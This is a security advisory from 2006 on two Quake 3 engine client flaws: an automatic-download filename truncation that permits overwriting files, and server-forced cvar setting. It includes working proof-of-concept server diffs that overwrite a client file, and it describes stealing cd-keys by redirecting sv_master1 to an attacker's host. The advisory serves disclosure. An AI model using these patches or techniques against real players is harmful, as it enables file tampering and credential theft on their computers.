Files and cvars overwriting in Quake 3 engine (1.32c / rev 803 / ...)
#######################################################################
Luigi Auriemma
Application: Quake 3 engine
http://www.idsoftware.com
http://www.icculus.org/quake3/
Versions: Quake 3 <= 1.32c
Icculus.org Quake 3 <= revision 803
other derived projects
Games: exist many games which use the Quake 3 engine and
probably they are all vulnerable but I'm not able and
have no time to test them.
An enough complete list of these games is available here:
http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine
Platforms: Windows, *nix, *BSD, Mac and others
Bugs: A] files overwriting through Automatic Downloading
B] cvars overwriting with possible information stealing
Exploitation: remote, versus client
Date: 27 Jun 2006
Author: Luigi Auriemma
e-mail: aluigi@xxxxxxxxxxxxx
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
The Quake 3 engine is the famous game engine developed by id Software
(http://www.idsoftware.com) in the far 1999 but is still one of the
most used, licensed and played engines.
It has been released open source under the GPL license some months ago
and now it's mainly maintained by Icculus
(http://www.icculus.org/quake3/) although exist many other derived
projects.
#######################################################################
=======
2) Bugs
=======
--------------------------------------------------
A] files overwriting through Automatic Downloading
--------------------------------------------------
The Quake 3 engine supports an option called "Automatic Downloading"
which allows the clients to automatically download the PK3 files (maps
and mods) available on the server but not locally.
This option is disabled by default for security reasons and Icculus
Quake 3 is actually the only version of the engine which uses an anti
directory traversal check for avoiding the overwriting of system files.
Anyway this check can be bypassed through the bug B described in this
advisory, so an attacker can overwrite any file in any disk of the
computer in which Quake 3 is running.
The following is a short description of the mechanism used by the "Auto
Downloading" option for downloading a PK3 file from a server:
- server sends the list of the checksums and names of the PK3 files
currently in use: sv_referencedPaks and sv_referencedPakNames
these informations (cvars) are contained in the systemInfo string
- the client compares the server's filenames and checksums with its own
- every unavailable or different PK3 file is added to the neededpaks
buffer using the Q_strcat function (for avoiding possible
buffer-overflow vulnerabilities) with the limitation of 64 chars for
each filename and the adding of the .pk3 extension to each remote and
local filename following the format: @remotename@localname
- the client starts to automatically download each file (remotename),
saves it (localname) with the temporary .tmp extension and then
renames it with the name available in the localname field seen before
The usage of Q_strcat allows a malicious server to avoid the adding of
the .pk3 extension (needed for security reasons) to the last filename
of the neededpaks buffer if the length of 1023 bytes is reached:
@remotename.pk3@xxxxxxxxxxxxxxxx@remotename.pk3@localname[.pk3]
So the latest .pk3 extension of the local filename is not added if the
total length of the string reaches this limit, that's all the bug.
The client truncates the filenames at maximum 64 bytes before adding
the .pk3 extension so we need to specify some useless files before our
target file for reaching the 1023 bytes limit.
The result is that a malicious server can overwrite all the files
contained in the folder pointed by the fs_homepath cvar of the client
or can create new files with any possible extension.
By default fs_homepath (where are stored the configuration files, the
Punkbuster files and others) is the ~/.q3a folder in Linux and the
Quake 3 folder in Windows BUT, as hinted before, we can modify it
through the B vulnerability which follows.
-------------------------------------------------------
B] cvars overwriting with possible information stealing
-------------------------------------------------------
The same string sent by the server containing the sv_referencedPaks and
sv_referencedPakNames cvars (variables) described in the previous bug
contains also many other cvars which are automatically set on the
client when the player joins the server (this is a fixed feature of the
engine, cannot be disabled and is not related to the Automatic
Downloading feature).
Everything is well explained in code/client/cl_parse.c:
void CL_SystemInfoChanged( void ) {
...
s = systemInfo;
while ( s ) {
Info_NextPair( &s, key, value );
if ( !key[0] ) {
break;
}
// ehw!
if ( !Q_stricmp( key, "fs_game" ) ) {
gameSet = qtrue;
}
Cvar_Set( key, value );
}
...
In short is possible to overwrite or create any cvar of the client.
The ways for exploiting this bug are a lot:
- cd-key stealing through a sv_master1 cvar which points to the
attacker's host, the Quake 3 engine sends plain-text cd-keys in the
authorization queries so they are ready to be reused
- enabling of the Automatic Downloading feature through
cl_allowdownload set to 1
- overwriting any file in the system through the fs_homepath cvar and
the bug A described in this advisory
- many others
#######################################################################
===========
3) The Code
===========
The proof-of-concept consists in a small modification of the server.
The following are the two diff files for overwriting the client's file
baseq3/games.log in the c: folder, remember to create a file called
bad.txt in the server's Quake 3 folder containing the data to put in
the target client's file.
Keep in mind that this PoC is really very basic and not so optimized,
it's just a quick and simple demonstration of the effects of both the
bugs at the same time.
Remember also to enable the "Automatic Downloading" option on the
client for testing the bug A.
Enter in the Quake 3 source folder (like /tmp/quake3, the patches have
been created on the revision 810 of Icculus Quake 3) and type:
patch -p0 < sv_client.diff
patch -p0 < sv_init.diff
sv_client.diff:
--- code/server/sv_client.c
+++ code/server/sv_client.c
@@ -714,6 +714,11 @@
// Find out if we are done. A zero-length block indicates EOF
if (cl->downloadBlockSize[cl->downloadClientBlock %
MAX_DOWNLOAD_WINDOW] == 0) {
Com_Printf( "clientDownload: %d : file \"%s\"
completed\n", cl - svs.clients, cl->downloadName );
+ if(memcmp(cl->downloadName, "none_", 5)) {
+ cl->state = CS_ZOMBIE;
+ SV_DropClient( cl, "disconnected" );
+ Com_Printf( "Malicious file sent to the client,
connection closed\n" );
+ }
SV_CloseDownload( cl );
return;
}
@@ -765,6 +770,13 @@
return; // Nothing being downloaded
if (!cl->download) {
+ if(!memcmp(cl->downloadName, "none_", 5)) {
+ cl->downloadSize = 0;
+ } else {
+ cl->downloadSize = FS_SV_FOpenFileRead( "bad.txt",
&cl->download);
+ }
+ unreferenced = 0;
+ goto letsgo;
// Chop off filename extension.
Com_sprintf(pakbuf, sizeof(pakbuf), "%s", cl->downloadName);
pakptr = Q_strrchr(pakbuf, '.');
@@ -845,6 +857,7 @@
return;
}
+letsgo:
Com_Printf( "clientDownload: %d : beginning \"%s\"\n", cl -
svs.clients, cl->downloadName );
// Init
sv_init.diff:
--- code/server/sv_init.c
+++ code/server/sv_init.c
@@ -533,9 +533,21 @@
// the server sends these to the clients so they can figure
// out which pk3s should be auto-downloaded
p = FS_ReferencedPakChecksums();
+ int timeint = time(NULL);
+ sprintf(p,
+ "%i %i %i %i %i %i %i %i",
+ timeint + 1, timeint + 2, timeint + 3, timeint + 4,
+ timeint + 5, timeint + 6, timeint + 7, timeint + 8);
Cvar_Set( "sv_referencedPaks", p );
p = FS_ReferencedPakNames();
+ sprintf(p,
+ "none_%059i none_%059i none_%059i none_%059i "
+ "none_%059i none_%059i none_%059i "
+ "baseq3/games.log___________________",
+ timeint + 1, timeint + 2, timeint + 3, timeint + 4,
+ timeint + 5, timeint + 6, timeint + 7);
Cvar_Set( "sv_referencedPakNames", p );
+ Cvar_Set( "fs_homepath", "c:" ); // or /tmp/ or .. (NO backslash)
// save systeminfo and serverinfo strings
Q_strncpyz( systemInfo, Cvar_InfoString_Big( CVAR_SYSTEMINFO ), sizeof(
systemInfo ) );
@@ -596,6 +608,7 @@
Cvar_Get ("sv_pakNames", "", CVAR_SYSTEMINFO | CVAR_ROM );
Cvar_Get ("sv_referencedPaks", "", CVAR_SYSTEMINFO | CVAR_ROM );
Cvar_Get ("sv_referencedPakNames", "", CVAR_SYSTEMINFO | CVAR_ROM );
+ Cvar_Get ("fs_homepath", "", CVAR_SYSTEMINFO | CVAR_ROM );
// server vars
sv_rconPassword = Cvar_Get ("rconPassword", "", CVAR_TEMP );
#######################################################################
======
4) Fix
======
Bug A has been fixed in Icculus Quake 3 version 804 but keep in mind
that the "Automatic Downloading" feature should be NEVER enabled.
Actually no fix is available for bug B.
#######################################################################
---
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org